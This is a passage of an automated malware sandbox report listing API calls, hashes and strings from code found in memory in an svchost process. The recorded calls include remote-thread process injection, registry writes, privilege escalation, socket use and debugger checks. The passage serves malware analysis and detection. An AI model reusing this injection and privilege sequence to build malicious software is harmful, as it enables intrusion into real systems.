                                                                                                                                                                                APIs
                                                                                                                                                                                • #19.WS2_32(1314E1A7,?,00000000,13143425,?,00000004,00000000,13143425,?,1315B7A8,0000001C,76B7EA30,?,?,1314E1A7,?), ref: 1314DB5E
                                                                                                                                                                                • #16.WS2_32(00000008,?,00000000,00020000,00000000,1314E1A7,?,00000000,13143425,?,00000004,00000000,13143425,?,1315B7A8,0000001C), ref: 1314DBAD
                                                                                                                                                                                • #16.WS2_32(?,?,00000000,?,00000008,?,00000000,00020000,00000000,1314E1A7,?,00000000,13143425,?,00000004,00000000), ref: 1314DC07
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000010.00000002.690483910.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_16_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: aedb760a50ced2a31eae24f47bad5823364800f75ea34ae41e42e9c1d7071104
                                                                                                                                                                                • Instruction ID: a6d8a547d4d7dba041dffb0585ee0a10fe1e84b7311ab2876e372012bd6c3884
                                                                                                                                                                                • Opcode Fuzzy Hash: aedb760a50ced2a31eae24f47bad5823364800f75ea34ae41e42e9c1d7071104
                                                                                                                                                                                • Instruction Fuzzy Hash: 1741DD3A604215AFDF16EBA8CC95DAE7779FF42610B64493CF422A3190EF70BA44CB50
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • #9.WS2_32(00000FA0,?,?,?,13143375,00000202,?,00016B00,LoadLibraryExA,?), ref: 131462FC
                                                                                                                                                                                • #23.WS2_32(00000002,00000002,00000011,00000FA0,?,?,?,13143375,00000202,?,00016B00,LoadLibraryExA,?), ref: 13146317
                                                                                                                                                                                • GetLastError.KERNEL32(00000002,00000002,00000011,00000FA0,?,?,?,13143375,00000202,?,00016B00,LoadLibraryExA,?), ref: 13146326
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000010.00000002.690483910.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_16_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ErrorLast
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1452528299-0
                                                                                                                                                                                • Opcode ID: 4798562a01600ef3f9dd65a926da48208d44cdd9dd444a59f9dfde149f2742bb
                                                                                                                                                                                • Instruction ID: 65d3a68209b55ec02d1a8e1dcb1c20dd2b6278565e4f18be07d174e7e848d9e5
                                                                                                                                                                                • Opcode Fuzzy Hash: 4798562a01600ef3f9dd65a926da48208d44cdd9dd444a59f9dfde149f2742bb
                                                                                                                                                                                • Instruction Fuzzy Hash: 06F04CF56103A4AFDB08ABE4CD96BA976A89F0631CF140539E462D53C5E3FC8100D732
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • RegOpenKeyExA.ADVAPI32(80000002,-00000004,000000EA,00000000,000F003F,131433FC), ref: 1314AD7C
                                                                                                                                                                                  • Part of subcall function 13142F89: lstrlenA.KERNEL32(?,C:\Windows\system32\regedit.exe,00000103,LoadLibraryExA), ref: 13142FEC
                                                                                                                                                                                • RegSetValueExA.ADVAPI32(131433FC,-00000004,0000002F,00000000,00000004,0000FFFE,00000004), ref: 1314ADA1
                                                                                                                                                                                • RegCloseKey.ADVAPI32(131433FC), ref: 1314ADAA
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000010.00000002.690483910.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_16_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CloseOpenValuelstrlen
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2964171075-0
                                                                                                                                                                                • Opcode ID: 51ed73a0fe790b9dd92d53e1637baf4121573ec2e986ea361f53db6b8728750e
                                                                                                                                                                                • Instruction ID: 463864c30009ddb7c9bf7bc6fec684855c3ce20d6730d88446eca340b249a078
                                                                                                                                                                                • Opcode Fuzzy Hash: 51ed73a0fe790b9dd92d53e1637baf4121573ec2e986ea361f53db6b8728750e
                                                                                                                                                                                • Instruction Fuzzy Hash: 86F0DA75740259BBF714EB90CD46FFDB77CAB10748F600074EB01BA1D4E7B4AA049625
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • #6.WS2_32(00000041,00000000,00000041,00000000,00000002,00000001), ref: 1314D1AB
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000010.00000002.690483910.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_16_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 9a956b9c07f47dc36a9e4558e2105b614252b6c184e43ec9b330204f38b3dc1f
                                                                                                                                                                                • Instruction ID: 47df7a40e1ac024c00daa250fcf612bec4e9fb83b135031a960e4ee8435f88d8
                                                                                                                                                                                • Opcode Fuzzy Hash: 9a956b9c07f47dc36a9e4558e2105b614252b6c184e43ec9b330204f38b3dc1f
                                                                                                                                                                                • Instruction Fuzzy Hash: E3E012B4900329AFDB41EBA5CA84A8A77BCF70130CF548565D801A2284E3B496449FA1
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 131453DC: GetEnvironmentVariableA.KERNEL32(-00000004,0000002B,C:\Windows\system32\regedit.exe,00000103,LoadLibraryExA), ref: 131453FC
                                                                                                                                                                                  • Part of subcall function 131453DC: PathAddBackslashA.SHLWAPI(C:\Windows\system32\regedit.exe), ref: 13145407
                                                                                                                                                                                  • Part of subcall function 131453DC: PathAppendA.SHLWAPI(C:\Windows\system32\regedit.exe,-00000004,00000028), ref: 1314541C
                                                                                                                                                                                • CreateFileA.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000006,00000000,1314334E,00016B00,LoadLibraryExA,?), ref: 1314543F
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000010.00000002.690483910.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_16_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Path$AppendBackslashCreateEnvironmentFileVariable
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2777513326-0
                                                                                                                                                                                • Opcode ID: 7952064c17b72f8ec2155692ee6dcf5d87db53bcce2995ed0505b70aa40820e9
                                                                                                                                                                                • Instruction ID: a0fb1ee771b706fa743988e8952bd7e380549e7e2bd202f0058836edd53182ad
                                                                                                                                                                                • Opcode Fuzzy Hash: 7952064c17b72f8ec2155692ee6dcf5d87db53bcce2995ed0505b70aa40820e9
                                                                                                                                                                                • Instruction Fuzzy Hash: B2C048A8BA1250BEFE6C1B309D5FF2B1A1C8701A02F38466CB202E8880BAD4A9108420
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • GetCommandLineA.KERNEL32(?,?,?,76B7EA30,00000000,00000000), ref: 1314526F
                                                                                                                                                                                • StrStrA.SHLWAPI(00000001,131413BC,?,?,?,76B7EA30,00000000,00000000), ref: 13145283
                                                                                                                                                                                • CreateProcessA.KERNEL32(00000000,1315CA60,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 131452BE
                                                                                                                                                                                • VirtualAllocEx.KERNEL32(?,00000000,1314DFF7,00003000,00000040,?,?,000000C1,?,?,?,?,?,?,76B7EA30,00000000), ref: 131452DC
                                                                                                                                                                                • TerminateProcess.KERNEL32(?,00000000,?,?,000000C1,?,?,?,?,?,?,76B7EA30,00000000,00000000), ref: 131452ED
                                                                                                                                                                                • WriteProcessMemory.KERNEL32(00000000,00000000,00000000,?,76B7EA30,?,?,000000C1,?,?,?,?,?,?,76B7EA30,00000000), ref: 1314533F
                                                                                                                                                                                • WriteProcessMemory.KERNEL32(00000000,00000000,00000000,?,76B7EA30,?,?,000000C1,?,?,?,?,?,?,76B7EA30,00000000), ref: 13145391
                                                                                                                                                                                • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,?,?,000000C1), ref: 131453B7
                                                                                                                                                                                • GetLastError.KERNEL32(?,?,000000C1,?,?,?,?,?,?,76B7EA30,00000000,00000000), ref: 131453C1
                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,000000C1,?,?,?,?,?,?,76B7EA30,00000000,00000000), ref: 131453CA
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000010.00000002.690483910.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_16_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Process$CreateMemoryWrite$AllocCloseCommandErrorHandleLastLineRemoteTerminateThreadVirtual
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3159359046-0
                                                                                                                                                                                • Opcode ID: a6f96749bbf0027a88557124152bec8ab4862b38c96b8b99793556fd527099f9
                                                                                                                                                                                • Instruction ID: ad95431ea890042b521bb897717c58ababc49f46811050eb4e0b726889a452ca
                                                                                                                                                                                • Opcode Fuzzy Hash: a6f96749bbf0027a88557124152bec8ab4862b38c96b8b99793556fd527099f9
                                                                                                                                                                                • Instruction Fuzzy Hash: CD512CB5A00249FFEB11DFA4CD84FAEBBB8EF08744F244469F905E6541E774AA41CB60
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • GdipAlloc.GDIPLUS(00000008,131475F5,00000000,?), ref: 1314F313
                                                                                                                                                                                • GdipAlloc.GDIPLUS(00000008), ref: 1314F35C
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000010.00000002.690483910.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_16_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AllocGdip
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1856340535-0
                                                                                                                                                                                • Opcode ID: 90cc83d8c346803ce5d403663a43de7c397794622860fffed05550019d7aa2dd
                                                                                                                                                                                • Instruction ID: f81b496d3d4300cab5010031e0854b99c83db3e085879ea78633854ed2d0f7ab
                                                                                                                                                                                • Opcode Fuzzy Hash: 90cc83d8c346803ce5d403663a43de7c397794622860fffed05550019d7aa2dd
                                                                                                                                                                                • Instruction Fuzzy Hash: E8518179E44205ABDF05DFA89844AEEB7B6EFC8310F39847AE014B7280DF745A55CB60
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000010.00000002.690483910.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_16_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 00da994b186377e4b8f21bf8588f886078ef020935df539317a41d5cbde725ec
                                                                                                                                                                                • Instruction ID: e4d13b8699b9a09e48b6935e0e801f78dddda115996eb3794c72b58bdeeea018
                                                                                                                                                                                • Opcode Fuzzy Hash: 00da994b186377e4b8f21bf8588f886078ef020935df539317a41d5cbde725ec
                                                                                                                                                                                • Instruction Fuzzy Hash: B49129726403159FE728DF7CCC90ABA77AAFB44304F25052AFA25A7180DB75EC858B60
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • IsDebuggerPresent.KERNEL32 ref: 13153DB0
                                                                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 13153DC5
                                                                                                                                                                                • UnhandledExceptionFilter.KERNEL32(13142210), ref: 13153DD0
                                                                                                                                                                                • GetCurrentProcess.KERNEL32(C0000409), ref: 13153DEC
                                                                                                                                                                                • TerminateProcess.KERNEL32(00000000), ref: 13153DF3
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000010.00000002.690483910.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_16_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2579439406-0
                                                                                                                                                                                • Opcode ID: bf21c57754bc23f7e2c6ce65f547fa5cbad6aae5547101e61787ace11ae8811a
                                                                                                                                                                                • Instruction ID: 4336d6d148fa358db4926c868d668893fab4dfed7503a4ed23d217601b250cef
                                                                                                                                                                                • Opcode Fuzzy Hash: bf21c57754bc23f7e2c6ce65f547fa5cbad6aae5547101e61787ace11ae8811a
                                                                                                                                                                                • Instruction Fuzzy Hash: AE21E3B5900326EFD36ADF28D5E4A443BB8FB4970CF10842EF618C3242E7B559818FA5
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • OpenProcessToken.ADVAPI32(000000FF,00000028,00000000), ref: 13145181
                                                                                                                                                                                • LookupPrivilegeValueA.ADVAPI32(00000000,-00000004,000000C0,?), ref: 131451A6
                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 131451B3
                                                                                                                                                                                • AdjustTokenPrivileges.ADVAPI32(00000000,00000000,?,00000010,?,1314521A), ref: 131451E5
                                                                                                                                                                                • GetLastError.KERNEL32 ref: 131451EB
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000010.00000002.690483910.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_16_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Token$AdjustCloseErrorHandleLastLookupOpenPrivilegePrivilegesProcessValue
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 379965542-0
                                                                                                                                                                                • Opcode ID: 38711aaf368b1f886249a48ed627c8ddb5286af99ca2571e7505373946fc1082
                                                                                                                                                                                • Instruction ID: 841742b94ca0d797a0f95ef85008fab51459c9a4e867e51777ba22eb5f869667
                                                                                                                                                                                • Opcode Fuzzy Hash: 38711aaf368b1f886249a48ed627c8ddb5286af99ca2571e7505373946fc1082
                                                                                                                                                                                • Instruction Fuzzy Hash: 2D010CB5A50259EFEB00EFA5CD49FEEBBBCFB04709F200125E516E6180E7749A448B60
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • _strcpy_s.LIBCMT ref: 13153009
                                                                                                                                                                                • __invoke_watson.LIBCMT ref: 1315301A
                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,1468EFF1,00000104), ref: 13153036
                                                                                                                                                                                • _strcpy_s.LIBCMT ref: 1315304B
                                                                                                                                                                                • __invoke_watson.LIBCMT ref: 1315305E
                                                                                                                                                                                • _strlen.LIBCMT ref: 13153067
                                                                                                                                                                                • _strlen.LIBCMT ref: 13153074
                                                                                                                                                                                • __invoke_watson.LIBCMT ref: 131530A1
                                                                                                                                                                                • _strcat_s.LIBCMT ref: 131530B4
                                                                                                                                                                                • __invoke_watson.LIBCMT ref: 131530C5
                                                                                                                                                                                • _strcat_s.LIBCMT ref: 131530D6
                                                                                                                                                                                • __invoke_watson.LIBCMT ref: 131530E7
                                                                                                                                                                                • GetStdHandle.KERNEL32(000000F4,?,?,00000000,775D4620,00000003,13153169,000000FC,13152892,00000001,00000000,00000000,?,13152F22,?,00000001), ref: 13153106
                                                                                                                                                                                • _strlen.LIBCMT ref: 13153127
                                                                                                                                                                                • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,13152F22,?,00000001,?,131523F7,00000018,13156978,0000000C,13152486,?), ref: 13153131
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000010.00000002.690483910.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_16_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: __invoke_watson$_strlen$File_strcat_s_strcpy_s$HandleModuleNameWrite
                                                                                                                                                                                • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                                                                                                                                • API String ID: 1879448924-4022980321
                                                                                                                                                                                • Opcode ID: 5ab5c7964740bc4e51b703f1b72183d174035eccb5bd8cb166ad743aad93f6d6
                                                                                                                                                                                • Instruction ID: 71e9ea7125f5ba385c0fd206275b0b2c2d91dcd27c7c62f4855ec8eb608d34f2
                                                                                                                                                                                • Opcode Fuzzy Hash: 5ab5c7964740bc4e51b703f1b72183d174035eccb5bd8cb166ad743aad93f6d6
                                                                                                                                                                                • Instruction Fuzzy Hash: 6631446BB403153BEA1263788D80FAB760C9B27294F1A0935FD79E20C2EF15E55281F2
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • LoadLibraryA.KERNEL32(USER32.DLL,00000000,00000000,00000314,?,?,?,1468EFD8,131530FF,1468EFD8,Microsoft Visual C++ Runtime Library,00012010), ref: 13154BE4
                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,MessageBoxA,?,?,?,1468EFD8,131530FF,1468EFD8,Microsoft Visual C++ Runtime Library,00012010), ref: 13154C00
                                                                                                                                                                                  • Part of subcall function 131529B0: TlsGetValue.KERNEL32(00000000,13152A25,00000000,13154BC5,00000000,00000000,00000314,?,?,?,1468EFD8,131530FF,1468EFD8,Microsoft Visual C++ Runtime Library,00012010), ref: 131529BD
                                                                                                                                                                                  • Part of subcall function 131529B0: TlsGetValue.KERNEL32(FFFFFFFF,?,?,?,1468EFD8,131530FF,1468EFD8,Microsoft Visual C++ Runtime Library,00012010), ref: 131529D4
                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,00000000,?,?,?,1468EFD8,131530FF,1468EFD8,Microsoft Visual C++ Runtime Library,00012010), ref: 13154C1D
                                                                                                                                                                                  • Part of subcall function 131529B0: GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,?,?,1468EFD8,131530FF,1468EFD8,Microsoft Visual C++ Runtime Library,00012010), ref: 131529E9
                                                                                                                                                                                  • Part of subcall function 131529B0: GetProcAddress.KERNEL32(00000000,EncodePointer,?,?,?,1468EFD8,131530FF,1468EFD8,Microsoft Visual C++ Runtime Library,00012010), ref: 13152A04
                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,00000000,?,?,?,1468EFD8,131530FF,1468EFD8,Microsoft Visual C++ Runtime Library,00012010), ref: 13154C32
                                                                                                                                                                                • __invoke_watson.LIBCMT ref: 13154C53
                                                                                                                                                                                  • Part of subcall function 13152275: _memset.LIBCMT ref: 13152301
                                                                                                                                                                                  • Part of subcall function 13152275: IsDebuggerPresent.KERNEL32(?,?,00000000), ref: 1315231F
                                                                                                                                                                                  • Part of subcall function 13152275: SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,00000000), ref: 13152329
                                                                                                                                                                                  • Part of subcall function 13152275: UnhandledExceptionFilter.KERNEL32(1468EFD8,?,?,00000000), ref: 13152333
                                                                                                                                                                                  • Part of subcall function 13152275: GetCurrentProcess.KERNEL32(C000000D,?,?,00000000), ref: 1315234E
                                                                                                                                                                                  • Part of subcall function 13152275: TerminateProcess.KERNEL32(00000000,?,?,00000000), ref: 13152355
                                                                                                                                                                                  • Part of subcall function 13152A27: TlsGetValue.KERNEL32(00000000,13153CE0,1315291D,?,?,13152F22,?,00000001,?,131523F7,00000018,13156978,0000000C,13152486,?), ref: 13152A34
                                                                                                                                                                                  • Part of subcall function 13152A27: TlsGetValue.KERNEL32(FFFFFFFF,?,13152F22,?,00000001,?,131523F7,00000018,13156978,0000000C,13152486,?,?,?,131520D2,0000000E), ref: 13152A4B
                                                                                                                                                                                  • Part of subcall function 13152A27: GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,13152F22,?,00000001,?,131523F7,00000018,13156978,0000000C,13152486,?,?,?,131520D2,0000000E), ref: 13152A60
                                                                                                                                                                                  • Part of subcall function 13152A27: GetProcAddress.KERNEL32(00000000,DecodePointer,?,13152F22,?,00000001,?,131523F7,00000018,13156978,0000000C,13152486,?,?,?,131520D2), ref: 13152A7B
                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetUserObjectInformationA,?,?,?,1468EFD8,131530FF), ref: 13154C67
                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetProcessWindowStation,?,?,?,1468EFD8,131530FF), ref: 13154C7F
                                                                                                                                                                                • __invoke_watson.LIBCMT ref: 13154CF2
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000010.00000002.690483910.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_16_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AddressProc$Value$ExceptionFilterHandleModuleProcessUnhandled__invoke_watson$CurrentDebuggerLibraryLoadPresentTerminate_memset
                                                                                                                                                                                • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$USER32.DLL
                                                                                                                                                                                • API String ID: 2940365033-232180764
                                                                                                                                                                                • Opcode ID: 683eaacba4102a1eb4dc363de1f925a92a96b79eb5cb38d11469d49619cc89fc
                                                                                                                                                                                • Instruction ID: 797ac02a85cf84c673578637bf572b9012ab3e7df7b1b5423257380eddd92f02
                                                                                                                                                                                • Opcode Fuzzy Hash: 683eaacba4102a1eb4dc363de1f925a92a96b79eb5cb38d11469d49619cc89fc
                                                                                                                                                                                • Instruction Fuzzy Hash: 25418276B44326ABCF159FB48D849DE7BA8EB5A218F2A053EF524F3140DF3095819B60
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • lstrlenA.KERNEL32(?,?,00000000,00000000,?,1314AFA8,00000000,1314C1F9,?,00000000,00000000,?,00000000), ref: 1314AE89
                                                                                                                                                                                • lstrcatA.KERNEL32(00000000,,,?,1314AFA8,00000000,1314C1F9,?,00000000,00000000,?,00000000), ref: 1314AEBD
                                                                                                                                                                                • lstrcatA.KERNEL32(?,13141434,?,1314AFA8,00000000,1314C1F9,?,00000000,00000000,?,00000000), ref: 1314AEC7
                                                                                                                                                                                • lstrcatA.KERNEL32(?,?,?,1314AFA8,00000000,1314C1F9,?,00000000,00000000,?,00000000), ref: 1314AECF
                                                                                                                                                                                • lstrcatA.KERNEL32(?,13141430,?,1314AFA8,00000000,1314C1F9,?,00000000,00000000,?,00000000), ref: 1314AED9
                                                                                                                                                                                • lstrcatA.KERNEL32(?,00000000,?,1314AFA8,00000000,1314C1F9,?,00000000,00000000,?,00000000), ref: 1314AEE1
                                                                                                                                                                                • lstrcatA.KERNEL32(?,1314142C,?,1314AFA8,00000000,1314C1F9,?,00000000,00000000,?,00000000), ref: 1314AEEB
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000010.00000002.690483910.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_16_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: lstrcat$lstrlen
                                                                                                                                                                                • String ID: ,
                                                                                                                                                                                • API String ID: 751011610-1078660327
                                                                                                                                                                                • Opcode ID: dc2ff06e781a30971f4c47e04ad755ca3376a08c8439b138cf481c717831073a
                                                                                                                                                                                • Instruction ID: c15ce393fe771dc85ad97575751dbf614e40ede76a161f64625e8f7c97c7a375
                                                                                                                                                                                • Opcode Fuzzy Hash: dc2ff06e781a30971f4c47e04ad755ca3376a08c8439b138cf481c717831073a
                                                                                                                                                                                • Instruction Fuzzy Hash: C8115E36A0022EAFDF109F64ED448DB3F65EF44265B158436F818A6161DB31DD70DFA1
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • GetModuleHandleA.KERNEL32(KERNEL32.DLL,131569D8,0000000C,13152BD8,00000000,00000000,?,?,?,13152A71,?,13152F22,?,00000001,?,131523F7), ref: 13152AD8
                                                                                                                                                                                • GetProcAddress.KERNEL32(?,EncodePointer,?,?,?,13152A71,?,13152F22,?,00000001,?,131523F7,00000018,13156978,0000000C,13152486), ref: 13152B0C
                                                                                                                                                                                • GetProcAddress.KERNEL32(?,DecodePointer,?,?,?,13152A71,?,13152F22,?,00000001,?,131523F7,00000018,13156978,0000000C,13152486), ref: 13152B1C
                                                                                                                                                                                • InterlockedIncrement.KERNEL32(1315AD08), ref: 13152B3E
                                                                                                                                                                                • __lock.LIBCMT ref: 13152B46
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000010.00000002.690483910.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_16_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AddressProc$HandleIncrementInterlockedModule__lock
                                                                                                                                                                                • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                                                                                                                                                                                • API String ID: 3405995401-2843748187
                                                                                                                                                                                • Opcode ID: 0ebfb853b3c9a725648ceaf362da5c9cb03e476904d3f71c207ffbcfa6ae4b73
                                                                                                                                                                                • Instruction ID: 114cc0e96a9c543aa3415dd1b771016eafede95e5498370d30359c62934f7b08
                                                                                                                                                                                • Opcode Fuzzy Hash: 0ebfb853b3c9a725648ceaf362da5c9cb03e476904d3f71c207ffbcfa6ae4b73
                                                                                                                                                                                • Instruction Fuzzy Hash: CB114F76A007029FE7119F79C840BEABBF0BF06315F144929F8B597651DB34A502CF61
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • DeleteCriticalSection.KERNEL32(00000000,00000000,1314D287,00000000,-00000008,00000000,00000000,1314DFF7,00000000,00000000,76B7EA30,1314E1F5,00000000), ref: 13143438
                                                                                                                                                                                • DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 13143448
                                                                                                                                                                                • GetCurrentThreadId.KERNEL32(76B7EA30), ref: 13143459
                                                                                                                                                                                • OpenThread.KERNEL32(00000001,00000000,00000000), ref: 13143478
                                                                                                                                                                                • TerminateThread.KERNEL32(00000000,00000000), ref: 13143486
                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 1314348D
                                                                                                                                                                                • Sleep.KERNEL32(000001F4), ref: 13143498
                                                                                                                                                                                • ExitThread.KERNEL32 ref: 131434A8
                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 131434B1
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000010.00000002.690483910.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_16_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Thread$CriticalDeleteExitSection$CloseCurrentHandleOpenProcessSleepTerminate
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3126711353-0
